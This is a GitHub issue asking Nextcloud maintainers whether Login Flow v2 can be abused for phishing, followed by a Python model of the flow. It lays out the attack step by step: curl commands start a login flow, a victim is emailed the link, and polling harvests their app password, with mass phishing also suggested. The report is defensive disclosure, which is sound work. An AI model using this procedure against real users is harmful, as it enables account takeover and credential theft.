Security Measures for "Login flow v2" ? #21698

@githubkoma

Description

Dear Team,

I discovered Login flow v2.

My Question is at the bottom :-)

Let's say a phisher tries to use that API to initiate the retrieval of an AppToken for UserXYZ, who is not himself:

```
curl -X POST https://demo2.nextcloud.com/index.php/login/v2
```

(Using demo2.nextcloud.com in this example, but it could be nextcloud.ImportantCompany.com as well.)

The phisher gets back the following:

```json
{"poll":{"token":"3cx8pDOb3QJfQJDZDo4WemN4cjQDIhV4YZZELxeL7Wm5qWiIyZkYnLbZnbyS4IdEEakvVYMqxY1PM6tFr3Paam2dOstOjarCX4NfxGGFUFOxzjDjziJFdgX2A8NKoRH","endpoint":"https:\/\/demo2.nextcloud.com\/index.php\/login\/v2\/poll"},"login":"https:\/\/demo2.nextcloud.com\/index.php\/login\/v2\/flow\/ve5rsdvyLkgPjMU8ozIDf2Q0YVpz3aEj98oKQ59N3SiAzrwP9Zi0Rm1kdjgcQgRoE0OL9s52im0cGAlAZ18QG0MX63k4pemHVlCShGZbFYI4AvRJ985bBavDsz0Lqc21s"}
```

The phisher then sends an e-mail to UserXYZ at ImportantCompany Ltd. asking them to open the link and follow the instructions at:
https://demo2.nextcloud.com/index.php/login/v2/flow/ve5rsdvyLkgPjMU8ozIDf2Q0YVpz3aEj98oKQ59N3SiAzrwP9Zi0Rm1kdjgcQgRoE0OL9s52im0cGAlAZ18QG0MX63k4pemHVlCShGZbFYI4AvRJ985bBavDsz0Lqc21s

The phisher waits for the user to grant access, and afterwards the phisher polls:

```
curl -X POST https://demo2.nextcloud.com/login/v2/poll -d "token=3cx8pDOb3QJfQJDZDo4WemN4cjQDIhV4YZZELxeL7Wm5qWiIyZkYnLbZnbyS4IdEEakvVYMqxY1PM6tFr3Paam2dOstOjarCX4NfxGGFUFOxzjDjziJFdgX2A8NKoRH"
```

So the phisher retrieves an AppToken for UserXYZ like:

```json
{
    "server":"https:\/\/demo2.com.com",
    "loginName":"UserXYZ",
    "appPassword":"yKTVA4zgxjfivy52WqD8kW3M2pKGQr6srmUXMipRdunxjPFripJn0GMfmtNOqOolYSuJ6sCN"
}
```

I assume the phisher can then use any API call whatsoever as that Nextcloud's user UserXYZ.

Question is: Are there any measures that prevent a phisher from using this method?
Perhaps not only targeted at a specific user, but using this for a mass-mailing phishing attack.
(The phisher then of course has to build an infrastructure to mass-poll the API, which should be no problem.)

Am I missing something here?
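To make the exchange described above concrete, here is an added server-side model of the Login Flow v2 state machine (init, user grant, poll); it is example code written for this page, not Nextcloud's implementation. The token lifetime, token lengths and the class/method names are assumptions; what it makes explicit is that the poll endpoint hands the app password to whoever presents the poll token, so the consent page shown to the user is the only point at which the initiator and the approver are tied together.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Optional

# Assumed lifetime of a pending flow; the issue does not state the real value.
FLOW_LIFETIME_S = 20 * 60


@dataclass
class Flow:
    poll_token: str            # returned to the initiator, presented at /poll
    login_token: str           # embedded in the /flow/<token> URL the user opens
    created: float
    granted_by: Optional[str] = None   # set once a logged-in user approves
    app_password: Optional[str] = None


class LoginFlowV2:
    """Constructed model of the two-token flow; `now` is injectable for testing."""

    def __init__(self, server: str, now=time.time):
        self.server, self.now = server, now
        self.by_poll: dict = {}
        self.by_login: dict = {}

    def init(self) -> dict:
        """POST /login/v2: unauthenticated, mints a poll token and a login URL."""
        flow = Flow(secrets.token_urlsafe(96), secrets.token_urlsafe(96), self.now())
        self.by_poll[flow.poll_token] = flow
        self.by_login[flow.login_token] = flow
        return {"poll": {"token": flow.poll_token,
                         "endpoint": f"{self.server}/index.php/login/v2/poll"},
                "login": f"{self.server}/index.php/login/v2/flow/{flow.login_token}"}

    def grant(self, login_token: str, user: str) -> bool:
        """Browser side: the logged-in user approves the flow on the /flow page."""
        flow = self.by_login.get(login_token)
        if flow is None or self._expired(flow) or flow.granted_by is not None:
            return False
        flow.granted_by = user
        flow.app_password = secrets.token_urlsafe(54)
        return True

    def poll(self, poll_token: str) -> Optional[dict]:
        """POST /login/v2/poll: None (an HTTP 404 in practice) until granted, then one-shot."""
        flow = self.by_poll.get(poll_token)
        if flow is None or self._expired(flow) or flow.granted_by is None:
            return None
        self.by_poll.pop(flow.poll_token, None)     # result can be collected only once
        self.by_login.pop(flow.login_token, None)
        return {"server": self.server, "loginName": flow.granted_by,
                "appPassword": flow.app_password}

    def _expired(self, flow: Flow) -> bool:
        return self.now() - flow.created > FLOW_LIFETIME_S
```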

Labels: 1. to develop (Accepted and waiting to be taken care of), bug
